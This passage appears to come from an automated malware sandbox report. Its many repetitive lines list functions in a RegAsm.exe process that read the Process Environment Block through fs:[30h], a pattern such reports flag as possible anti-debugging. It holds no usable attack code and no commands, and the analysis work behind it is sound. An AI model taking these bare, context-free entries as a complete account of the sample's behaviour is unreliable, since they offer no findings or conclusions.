          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F30185 mov eax, dword ptr fs:[00000030h]10_2_02F30185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEA197 mov eax, dword ptr fs:[00000030h]10_2_02EEA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEA197 mov eax, dword ptr fs:[00000030h]10_2_02EEA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEA197 mov eax, dword ptr fs:[00000030h]10_2_02EEA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F89179 mov eax, dword ptr fs:[00000030h]10_2_02F89179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h]10_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F88158 mov eax, dword ptr fs:[00000030h]10_2_02F88158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE9148 mov eax, dword ptr fs:[00000030h]10_2_02EE9148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE9148 mov eax, dword ptr fs:[00000030h]10_2_02EE9148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE9148 mov eax, dword ptr fs:[00000030h]10_2_02EE9148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE9148 mov eax, dword ptr fs:[00000030h]10_2_02EE9148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC5152 mov eax, dword ptr fs:[00000030h]10_2_02FC5152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEC156 mov eax, dword ptr fs:[00000030h]10_2_02EEC156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF6154 mov eax, dword ptr fs:[00000030h]10_2_02EF6154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF6154 mov eax, dword ptr fs:[00000030h]10_2_02EF6154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F84144 mov eax, dword ptr fs:[00000030h]10_2_02F84144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F84144 mov eax, dword ptr fs:[00000030h]10_2_02F84144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F84144 mov ecx, dword ptr fs:[00000030h]10_2_02F84144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F84144 mov eax, dword ptr fs:[00000030h]10_2_02F84144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F84144 mov eax, dword ptr fs:[00000030h]10_2_02F84144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF7152 mov eax, dword ptr fs:[00000030h]10_2_02EF7152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F20124 mov eax, dword ptr fs:[00000030h]10_2_02F20124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB136 mov eax, dword ptr fs:[00000030h]10_2_02EEB136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB136 mov eax, dword ptr fs:[00000030h]10_2_02EEB136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB136 mov eax, dword ptr fs:[00000030h]10_2_02EEB136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB136 mov eax, dword ptr fs:[00000030h]10_2_02EEB136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF1131 mov eax, dword ptr fs:[00000030h]10_2_02EF1131
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF1131 mov eax, dword ptr fs:[00000030h]10_2_02EF1131
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9A118 mov ecx, dword ptr fs:[00000030h]10_2_02F9A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9A118 mov eax, dword ptr fs:[00000030h]10_2_02F9A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9A118 mov eax, dword ptr fs:[00000030h]10_2_02F9A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9A118 mov eax, dword ptr fs:[00000030h]10_2_02F9A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB0115 mov eax, dword ptr fs:[00000030h]10_2_02FB0115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E6F2 mov eax, dword ptr fs:[00000030h]10_2_02F6E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E6F2 mov eax, dword ptr fs:[00000030h]10_2_02F6E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E6F2 mov eax, dword ptr fs:[00000030h]10_2_02F6E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E6F2 mov eax, dword ptr fs:[00000030h]10_2_02F6E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F706F1 mov eax, dword ptr fs:[00000030h]10_2_02F706F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F706F1 mov eax, dword ptr fs:[00000030h]10_2_02F706F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAD6F0 mov eax, dword ptr fs:[00000030h]10_2_02FAD6F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1D6E0 mov eax, dword ptr fs:[00000030h]10_2_02F1D6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1D6E0 mov eax, dword ptr fs:[00000030h]10_2_02F1D6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h]10_2_02F836EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h]10_2_02F836EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h]10_2_02F836EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h]10_2_02F836EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h]10_2_02F836EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h]10_2_02F836EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F236EF mov eax, dword ptr fs:[00000030h]10_2_02F236EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h]10_2_02EFB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h]10_2_02EFB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h]10_2_02EFB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h]10_2_02EFB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h]10_2_02EFB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h]10_2_02EFB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2A6C7 mov ebx, dword ptr fs:[00000030h]10_2_02F2A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2A6C7 mov eax, dword ptr fs:[00000030h]10_2_02F2A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB16CC mov eax, dword ptr fs:[00000030h]10_2_02FB16CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB16CC mov eax, dword ptr fs:[00000030h]10_2_02FB16CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB16CC mov eax, dword ptr fs:[00000030h]10_2_02FB16CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB16CC mov eax, dword ptr fs:[00000030h]10_2_02FB16CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAF6C7 mov eax, dword ptr fs:[00000030h]10_2_02FAF6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F216CF mov eax, dword ptr fs:[00000030h]10_2_02F216CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F266B0 mov eax, dword ptr fs:[00000030h]10_2_02F266B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EED6AA mov eax, dword ptr fs:[00000030h]10_2_02EED6AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EED6AA mov eax, dword ptr fs:[00000030h]10_2_02EED6AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2C6A6 mov eax, dword ptr fs:[00000030h]10_2_02F2C6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE76B2 mov eax, dword ptr fs:[00000030h]10_2_02EE76B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE76B2 mov eax, dword ptr fs:[00000030h]10_2_02EE76B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE76B2 mov eax, dword ptr fs:[00000030h]10_2_02EE76B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7368C mov eax, dword ptr fs:[00000030h]10_2_02F7368C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7368C mov eax, dword ptr fs:[00000030h]10_2_02F7368C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7368C mov eax, dword ptr fs:[00000030h]10_2_02F7368C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7368C mov eax, dword ptr fs:[00000030h]10_2_02F7368C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF4690 mov eax, dword ptr fs:[00000030h]10_2_02EF4690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF4690 mov eax, dword ptr fs:[00000030h]10_2_02EF4690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F22674 mov eax, dword ptr fs:[00000030h]10_2_02F22674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2A660 mov eax, dword ptr fs:[00000030h]10_2_02F2A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2A660 mov eax, dword ptr fs:[00000030h]10_2_02F2A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F29660 mov eax, dword ptr fs:[00000030h]10_2_02F29660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F29660 mov eax, dword ptr fs:[00000030h]10_2_02F29660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB866E mov eax, dword ptr fs:[00000030h]10_2_02FB866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB866E mov eax, dword ptr fs:[00000030h]10_2_02FB866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0C640 mov eax, dword ptr fs:[00000030h]10_2_02F0C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF262C mov eax, dword ptr fs:[00000030h]10_2_02EF262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h]10_2_02EEF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC5636 mov eax, dword ptr fs:[00000030h]10_2_02FC5636
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F26620 mov eax, dword ptr fs:[00000030h]10_2_02F26620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F28620 mov eax, dword ptr fs:[00000030h]10_2_02F28620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E627 mov eax, dword ptr fs:[00000030h]10_2_02F0E627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32619 mov eax, dword ptr fs:[00000030h]10_2_02F32619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2F603 mov eax, dword ptr fs:[00000030h]10_2_02F2F603
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F21607 mov eax, dword ptr fs:[00000030h]10_2_02F21607
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF3616 mov eax, dword ptr fs:[00000030h]10_2_02EF3616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF3616 mov eax, dword ptr fs:[00000030h]10_2_02EF3616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h]10_2_02F0260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h]10_2_02F0260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h]10_2_02F0260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h]10_2_02F0260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h]10_2_02F0260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h]10_2_02F0260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h]10_2_02F0260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E609 mov eax, dword ptr fs:[00000030h]10_2_02F6E609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFD7E0 mov ecx, dword ptr fs:[00000030h]10_2_02EFD7E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF47FB mov eax, dword ptr fs:[00000030h]10_2_02EF47FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF47FB mov eax, dword ptr fs:[00000030h]10_2_02EF47FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7E7E1 mov eax, dword ptr fs:[00000030h]10_2_02F7E7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F127ED mov eax, dword ptr fs:[00000030h]10_2_02F127ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F127ED mov eax, dword ptr fs:[00000030h]10_2_02F127ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F127ED mov eax, dword ptr fs:[00000030h]10_2_02F127ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFC7C0 mov eax, dword ptr fs:[00000030h]10_2_02EFC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF57C0 mov eax, dword ptr fs:[00000030h]10_2_02EF57C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF57C0 mov eax, dword ptr fs:[00000030h]10_2_02EF57C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF57C0 mov eax, dword ptr fs:[00000030h]10_2_02EF57C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F707C3 mov eax, dword ptr fs:[00000030h]10_2_02F707C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF07AF mov eax, dword ptr fs:[00000030h]10_2_02EF07AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1D7B0 mov eax, dword ptr fs:[00000030h]10_2_02F1D7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC37B6 mov eax, dword ptr fs:[00000030h]10_2_02FC37B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h]10_2_02EEF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h]10_2_02F7F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h]10_2_02F7F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h]10_2_02F7F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h]10_2_02F7F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h]10_2_02F7F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F797A9 mov eax, dword ptr fs:[00000030h]10_2_02F797A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAF78A mov eax, dword ptr fs:[00000030h]10_2_02FAF78A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h]10_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB765 mov eax, dword ptr fs:[00000030h]10_2_02EEB765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB765 mov eax, dword ptr fs:[00000030h]10_2_02EEB765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB765 mov eax, dword ptr fs:[00000030h]10_2_02EEB765
